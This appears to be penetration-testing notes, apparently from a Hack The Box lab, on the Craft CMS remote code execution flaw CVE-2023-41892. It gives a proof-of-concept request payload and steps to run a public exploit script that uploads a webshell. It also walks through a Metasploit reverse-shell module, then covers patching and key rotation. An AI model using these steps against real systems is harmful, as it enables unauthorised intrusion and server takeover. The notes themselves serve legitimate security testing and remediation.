Craft CMS could allow a remote authenticated attacker to execute arbitrary code on the system, caused by a flaw in the Craft installations. By sending a specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system.

The vulnerability occurs using a PHP object creation in the `\craft\controllers\ConditionsController` class which allows to run arbitrary PHP code by escalating the object creation calling some methods available in `\GuzzleHttp\Psr7\FnStream`.

Using this vulnerability in combination with The Imagick Extension and MSL which stands for Magick Scripting Language, a full RCE can be achieved. MSL is a built-in ImageMagick language that facilitates the reading of images, performance of image processing tasks, and writing of results back to the filesystem.

This can be leveraged to create a dummy image containing malicious PHP code using the Imagick constructor class delivering a webshell that can be accessed by the attacker, thereby executing the malicious PHP code and gaining access to the system.

Affected Products

  • Craft CMS Craft CMS 4.4.14
  • affected at >= 4.0.0-RC1, <= 4.4.14

Identification

Wappalyzar

Source Code

  • curl http://website.com

  • curl http://website.com –i

HTTP headers (Proxy)

Manual (Proxy)

1. You can capture a HTTP request, and modify the data. Make sure the method is correct

  • action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream","__construct()":[{"close":null}],"_fn_close":"phpinfo"}}

2. The response should include the phpinfo() data

Exploitation (Script)

1. This vulnerability can be exploited using a script (https://github.com/Faelian/CraftCMS_CVE-2023-41892), download it using git

  • git clone https://github.com/Faelian/CraftCMS_CVE-2023-41892.git

2. Run craft-cms.py (sometimes you need to modify the source code for the webshell to be uploaded to a writable folder)

  • python3 craft-cms.py http://surveillance.htb

3. You can also run commands from shell.php (http://surveillance.htb/shell.php?cmd=whoami)

Important: remember to delete this file after your assessment. You can also upload a webshell having already the chance to execute commands.

Exploitation (Metasploit)

1. The exploit (craftcms_unauth_rce_cve_2023_41892) can be used to exploit this vulnerability and get a reverse shell

  • use exploit/linux/http/craftcms_unauth_rce_cve_2023_41892
  • show options

2. Set the options

  • set RHOSTS surveillance.htb
  • set LHOST tun0

3. (OPTIONAL) Modify the port and SSL, in my case the website was using port 80, without SSL

  • set RPORT 80
  • set SSL false

4. (OPTIONAL), set the function to inject our payload

  • set command system

5. Run the exploit

  • run

Remedy

Upgrade to the latest version of Craft CMS (3.8.15, 4.4.15 or later)

Besides applying the patch rotate the CRAFT_SECURITY_KEY immediately. knowing the key will lead to an unauthenticated RCE on a widely used CraftCMS plugin, and there may be more.

Reference

https://www.cve.org/CVERecord?id=CVE-2023-41892

https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g

https://github.com/craftcms/cms/commit/7359d18d46389ffac86c2af1e0cd59e37c298857

https://github.com/craftcms/cms/commit/a270b928f3d34ad3bd953b81c304424edd57355e

https://github.com/craftcms/cms/commit/c0a37e15cc925c473e60e27fe64054993b867ac1

https://github.com/craftcms/cms/commit/c0a37e15cc925c473e60e27fe64054993b867ac1#diff-47dd43d86f85161944dfcce2e41d31955c4184672d9bd9d82b948c6b01b86476

https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#4415---2023-07-03-critical

https://packetstormsecurity.com/files/176303/Craft-CMS-4.4.14-Remote-Code-Execution.html

https://www.rapid7.com/db/modules/exploit/linux/http/craftcms_unauth_rce_cve_2023_41892/

https://gist.github.com/to016/b796ca3275fa11b5ab9594b1522f7226